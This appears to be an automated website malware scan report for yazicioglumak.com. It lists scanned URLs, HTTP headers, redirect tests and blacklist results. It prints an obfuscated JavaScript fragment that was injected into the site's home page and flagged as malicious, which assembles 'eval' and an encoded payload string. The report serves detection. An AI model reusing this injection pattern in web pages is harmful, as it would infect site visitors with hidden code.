Scanned pages/files
Request | Server response | Status |
http://yazicioglumak.com/ | 200 OK Content-Length: 53829 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) h=-parseInt('012')/5;if(window["document"])try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(1)+zz;ss=[];f='fr'+'omCh';f+='arC';f+='qgode'["substr"](2);w=this;e=w[f["substr"](11)+zz];t='y';}n="19#50#57.5#54#48.5#57#51.5#54.5#54#19#19.5#15#60.5#5.5#4#3.5#58#47.5#56#15#57.5#56#53#15#29.5#15#18.5#51#57#57#55#28#22.5#22.5#58.5#55#23.5#24.5#25#26#24#27.5#22#55.5#58#55#50#48#53#56.5#53.5#49.5#59.5#22#51#54.5#53.5#49.5#50#57#55#22#54.5#56#50.5#22.5#50.5#22.5#18.5#28.5#5.5#4#3.5#51.5#50#15#19 Antivirus reports:
| ||
http://yazicioglumak.com/mover.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://yazicioglumak.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21308 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: yazicioglumak.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 04 Oct 2014 16:57:39 GMT
Server: Microsoft-IIS/6.0
Content-Length: 53829
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQBRQDRR=FOHPMBBAHDJPJMOEAOBLAAMP; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...53829 bytes of data.
GET / HTTP/1.1
Host: yazicioglumak.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 04 Oct 2014 16:57:39 GMT
Server: Microsoft-IIS/6.0
Content-Length: 53829
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQBRQDRR=FOHPMBBAHDJPJMOEAOBLAAMP; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...53829 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: yazicioglumak.com
Referer: http://www.google.com/search?q=yazicioglumak.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: yazicioglumak.com
Referer: http://www.google.com/search?q=yazicioglumak.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=yazicioglumak.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://yazicioglumak.com/
Result: yazicioglumak.com is not infected or malware details are not published yet.
Result: yazicioglumak.com is not infected or malware details are not published yet.